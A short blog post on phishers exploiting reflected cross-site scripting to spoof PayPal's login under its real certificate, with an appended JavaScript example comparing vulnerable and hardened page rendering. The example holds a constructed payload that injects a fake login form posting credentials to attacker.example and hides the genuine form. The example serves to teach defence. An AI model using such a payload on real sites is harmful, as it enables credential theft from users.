Phishing – so many flaws to exploit, so little time
In the last week there was a well documented writeup of a cross-site scripting vulnerability that allowed a phisher to pose as the PayPal login page under THE LEGIT PAYPAL SSL CERTIFICATE…. Brian Krebs at Security Fix has details on some of the new and interesting ways phishers are trying to separate us from our personal information.
Essentially these vulnerabilities occur on a site where a form field is not validated, or not cut down to JUST what the form needs, before the server echoes it back into the page. A phisher can then supply markup or script as the "input" and have the site rewrite its own page, so the fake login form is served from the real domain with the real certificate. Tools such as the Netcraft toolbar can help defend you against this type of phishing, but caution with links in email is certainly another defence. Sites would also do well to audit their own pages for these reflected-input flaws.
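The mechanism above, as an added example that is not part of the original post and not code from PayPal or any real site: a page that reflects a "msg" query parameter into its HTML, first in the vulnerable form and then hardened with an allow-list, a length cap and output encoding. The site path, the field length, the attacker URL and the phishing payload are all constructed for this illustration.

```javascript
// Added illustration, not code from the original post or from any real site.
// A page that reflects a query parameter ("msg") into its HTML, shown in a
// vulnerable form and a hardened form. Site path, field length, attacker URL
// and the phishing payload are all constructed for this example.

const LEGIT_ACTION = "/login";   // assumed: the site's real login handler
const MAX_LEN = 40;              // assumed: the longest message the page needs

// Only the characters a status message legitimately needs; anything else
// (angle brackets, quotes, slashes) is rejected rather than reflected.
const MESSAGE_ALLOWED = /^[A-Za-z0-9 .,!?'-]*$/;

function validateMessage(msg) {
  return typeof msg === "string" && msg.length <= MAX_LEN && MESSAGE_ALLOWED.test(msg);
}

// Encode at the point of output so no input can change the page's markup.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

function loginForm() {
  return `<form action="${LEGIT_ACTION}" method="post">\n` +
         `  <input name="user"><input name="pass" type="password">\n</form>`;
}

// VULNERABLE: the parameter is dropped straight into the markup.
function renderVulnerable(msg) {
  return `<html><body>\n<p>${msg}</p>\n${loginForm()}\n</body></html>`;
}

// HARDENED: validate (allow-list plus length), then encode on output anyway.
function renderHardened(msg) {
  const text = validateMessage(msg) ? msg : "Please log in.";
  return `<html><body>\n<p>${escapeHtml(text)}</p>\n${loginForm()}\n</body></html>`;
}

// Constructed phishing payload: closes the <p>, injects a look-alike login
// form posting to the attacker, and hides the real one with a stylesheet.
// Served under the real site's certificate, the browser shows a valid padlock.
const ATTACKER = "http://attacker.example/steal";
const PHISH_PAYLOAD =
  `</p><form action="${ATTACKER}" method="post">` +
  `<input name="user"><input name="pass" type="password"><input type="submit">` +
  `</form><style>form[action="${LEGIT_ACTION}"]{display:none}</style><p>`;

// Does the rendered page contain a form that posts to the given URL?
function postsTo(html, action) {
  return html.includes(`<form action="${action}"`);
}

console.log("vulnerable page posts to attacker:", postsTo(renderVulnerable(PHISH_PAYLOAD), ATTACKER));
console.log("hardened page posts to attacker:  ", postsTo(renderHardened(PHISH_PAYLOAD), ATTACKER));
```

The two defences are deliberately independent: the allow-list and length cap keep the field to what the form actually needs (the point the post makes), and the output encoding means that even a value which slips past validation cannot change the page's markup.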